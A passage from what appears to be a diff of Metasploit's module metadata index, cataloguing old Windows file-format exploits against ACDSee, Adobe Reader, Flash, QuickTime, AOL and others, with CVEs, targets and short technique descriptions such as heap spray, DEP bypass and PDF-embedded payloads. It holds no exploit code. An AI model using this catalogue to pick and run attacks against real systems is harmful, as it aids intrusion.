This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.", + "references": [ + "CVE-2011-2595", + "OSVDB-75425", + "BID-49558" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ACDSee FotoSlate 4.0 Build 146" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/acdsee_fotoslate_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/acdsee_xpm": { + "name": "ACDSee XPM File Section Buffer Overflow", + "fullname": "exploit/windows/fileformat/acdsee_xpm", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-11-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2007-2193", + "OSVDB-35236", + "BID-23620" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ACDSee 9.0 (Build 1008)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/acdsee_xpm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/actfax_import_users_bof": { + "name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow", + "fullname": "exploit/windows/fileformat/actfax_import_users_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-28", + "type": "exploit", + 
"author": [ + "Craig Freyman", + "Brandon Perry", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.", + "references": [ + "OSVDB-85175", + "EDB-20915", + "URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/actfax_import_users_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/activepdf_webgrabber": { + "name": "activePDF WebGrabber ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/activepdf_webgrabber", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-08-26", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. 
This control is not marked safe\n for scripting, so choose your attack vector accordingly.", + "references": [ + "OSVDB-64579", + "URL-http://www.activepdf.com/products/serverproducts/webgrabber/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/activepdf_webgrabber", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_collectemailinfo": { + "name": "Adobe Collab.collectEmailInfo() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_collectemailinfo", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-08", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5659", + "OSVDB-41495" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_collectemailinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_cooltype_sing": { + "name": "Adobe CoolType SING Table 
\"uniqueName\" Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_cooltype_sing", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-09-07", + "type": "exploit", + "author": [ + "Unknown", + "sn0wfl0w", + "jduck " + ], + "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.", + "references": [ + "CVE-2010-2883", + "OSVDB-67849", + "URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html", + "URL-http://www.adobe.com/support/security/advisories/apsa10-02.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_cooltype_sing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flashplayer_button": { + "name": "Adobe Flash Player \"Button\" Remote Code Execution", + "fullname": "exploit/windows/fileformat/adobe_flashplayer_button", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-28", + "type": "exploit", + "author": [ + "Unknown", + "Haifei Li", + "jduck " + ], + "description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. 
An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.", + "references": [ + "CVE-2010-3654", + "OSVDB-68932", + "BID-44504", + "URL-http://www.adobe.com/support/security/advisories/apsa10-05.html", + "URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/", + "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flashplayer_button", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flashplayer_newfunction": { + "name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", + "fullname": "exploit/windows/fileformat/adobe_flashplayer_newfunction", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-04", + "type": "exploit", + "author": [ + "Unknown", + "jduck " + ], + "description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. 
An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.", + "references": [ + "CVE-2010-1297", + "OSVDB-65141", + "BID-40586", + "URL-http://www.adobe.com/support/security/advisories/apsa10-01.html", + "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flashplayer_newfunction", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flatedecode_predictor02": { + "name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow", + "fullname": "exploit/windows/fileformat/adobe_flatedecode_predictor02", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-08", + "type": "exploit", + "author": [ + "unknown", + "jduck " + ], + "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.", + "references": [ + "CVE-2009-3459", + "BID-36600", + "OSVDB-58729", + "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/", + "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows Universal (JS Heap Spray)" + ], + 
"mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flatedecode_predictor02", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_geticon": { + "name": "Adobe Collab.getIcon() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_geticon", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-24", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens ", + "jduck " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2009-0927", + "OSVDB-53647", + "ZDI-09-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Universal (JS Heap Spray)" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_geticon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_illustrator_v14_eps": { + "name": "Adobe Illustrator CS4 v14.0.0", + "fullname": "exploit/windows/fileformat/adobe_illustrator_v14_eps", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-03", + "type": "exploit", + "author": [ + "pyrokinesis", + "dookie" + ], + "description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit", + "references": [ + 
"CVE-2009-4195", + "BID-37192", + "OSVDB-60632", + "EDB-10281" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_illustrator_v14_eps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_jbig2decode": { + "name": "Adobe JBIG2Decode Memory Corruption", + "fullname": "exploit/windows/fileformat/adobe_jbig2decode", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-02-19", + "type": "exploit", + "author": [ + "natron ", + "xort", + "redsand", + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.", + "references": [ + "CVE-2009-0658", + "OSVDB-52073" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v9.0.0 (Windows XP SP3 English)", + "Adobe Reader v8.1.2 (Windows XP SP2 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_jbig2decode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_libtiff": { + "name": "Adobe Acrobat Bundled LibTIFF Integer Overflow", + "fullname": "exploit/windows/fileformat/adobe_libtiff", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-02-16", + "type": "exploit", + "author": [ + "Microsoft", + "villy ", + 
"jduck " + ], + "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.", + "references": [ + "CVE-2010-0188", + "BID-38195", + "OSVDB-62526", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html", + "URL-http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76", + "URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_libtiff", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_media_newplayer": { + "name": "Adobe Doc.media.newPlayer Use After Free Vulnerability", + "fullname": "exploit/windows/fileformat/adobe_media_newplayer", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-12-14", + "type": "exploit", + "author": [ + "unknown", + "hdm ", + "pusscat ", + "jduck " + ], + "description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.", + "references": [ + "CVE-2009-4324", + "BID-37331", + "OSVDB-60980" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows English (JS Heap Spray)", + "Adobe Reader Windows German (JS Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb", + "is_install_path": true, + "ref_name": 
"windows/fileformat/adobe_media_newplayer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_pdf_embedded_exe": { + "name": "Adobe PDF Embedded EXE Social Engineering", + "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "Colin Ames ", + "jduck " + ], + "description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.", + "references": [ + "CVE-2010-1240", + "OSVDB-63667", + "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", + "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", + "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)" + ], + "mod_time": "2024-08-26 16:47:26 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_pdf_embedded_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": { + "name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", + "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs", + "aliases": [], + "rank": 600, + 
"disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "Jeremy Conway " + ], + "description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.", + "references": [ + "CVE-2010-1240", + "OSVDB-63667", + "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", + "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", + "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_reader_u3d": { + "name": "Adobe Reader U3D Memory Corruption Vulnerability", + "fullname": "exploit/windows/fileformat/adobe_reader_u3d", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-12-06", + "type": "exploit", + "author": [ + "Felipe Andres Manzano", + "sinn3r ", + "juan vazquez ", + "jduck " + ], + "description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. 
A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.", + "references": [ + "CVE-2011-2462", + "OSVDB-77529", + "BID-50922", + "URL-http://www.adobe.com/support/security/advisories/apsa11-04.html", + "URL-http://web.archive.org/web/20210228195907/http://blog.9bplus.com/analyzing-cve-2011-2462/", + "URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0", + "URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_reader_u3d", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_toolbutton": { + "name": "Adobe Reader ToolButton Use After Free", + "fullname": "exploit/windows/fileformat/adobe_toolbutton", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-08-08", + "type": "exploit", + "author": [ + "Soroush Dalili", + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. 
This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.", + "references": [ + "CVE-2013-3346", + "OSVDB-96745", + "ZDI-13-212", + "URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP / Adobe Reader 9/10/11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_toolbutton", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_u3d_meshdecl": { + "name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", + "fullname": "exploit/windows/fileformat/adobe_u3d_meshdecl", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-13", + "type": "exploit", + "author": [ + "Felipe Andres Manzano ", + "jduck " + ], + "description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. 
By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2009-3953", + "OSVDB-61690", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows Universal (JS Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_u3d_meshdecl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_utilprintf": { + "name": "Adobe util.printf() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_utilprintf", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-08", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. 
By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-2992", + "OSVDB-49520" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.1.2 (Windows XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_utilprintf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/allplayer_m3u_bof": { + "name": "ALLPlayer M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/allplayer_m3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-09", + "type": "exploit", + "author": [ + "metacom", + "Mike Czumak", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. 
This module has been tested successfully on\n Windows 7 SP1.", + "references": [ + "CVE-2013-7409", + "BID-62926", + "BID-63896", + "EDB-28855", + "EDB-29549", + "EDB-29798", + "EDB-32041", + "OSVDB-98283", + "URL-http://www.allplayer.org/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + " ALLPlayer 2.8.1 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/allplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/altap_salamander_pdb": { + "name": "Altap Salamander 2.5 PE Viewer Buffer Overflow", + "fullname": "exploit/windows/fileformat/altap_salamander_pdb", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-19", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.", + "references": [ + "CVE-2007-3314", + "BID-24557", + "OSVDB-37579", + "URL-http://vuln.sg/salamander25-en.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal Salamander 2.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/altap_salamander_pdb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/fileformat/aol_desktop_linktag": { + "name": "AOL Desktop 9.6 RTX Buffer Overflow", + "fullname": "exploit/windows/fileformat/aol_desktop_linktag", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "sup3r", + "sickn3ss", + "sinn3r ", + "mr_me ", + "silent_dream" + ], + "description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.", + "references": [ + "OSVDB-70741", + "EDB-16085" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AOL Desktop 9.6 on Windows XP SP3", + "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", + "AOL Desktop 9.6 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aol_desktop_linktag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/aol_phobos_bof": { + "name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow", + "fullname": "exploit/windows/fileformat/aol_phobos_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2010-01-20", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.", + "references": [ + "OSVDB-61964", + "EDB-11204", + 
"URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aol_phobos_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_pnsize": { + "name": "Apple QuickTime PICT PnSize Buffer Overflow", + "fullname": "exploit/windows/fileformat/apple_quicktime_pnsize", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-08-08", + "type": "exploit", + "author": [ + "MC ", + "corelanc0d3r " + ], + "description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.", + "references": [ + "CVE-2011-0257", + "OSVDB-74687", + "EDB-17777", + "BID-49144" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 with DEP bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_pnsize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_rdrf": { + "name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", + 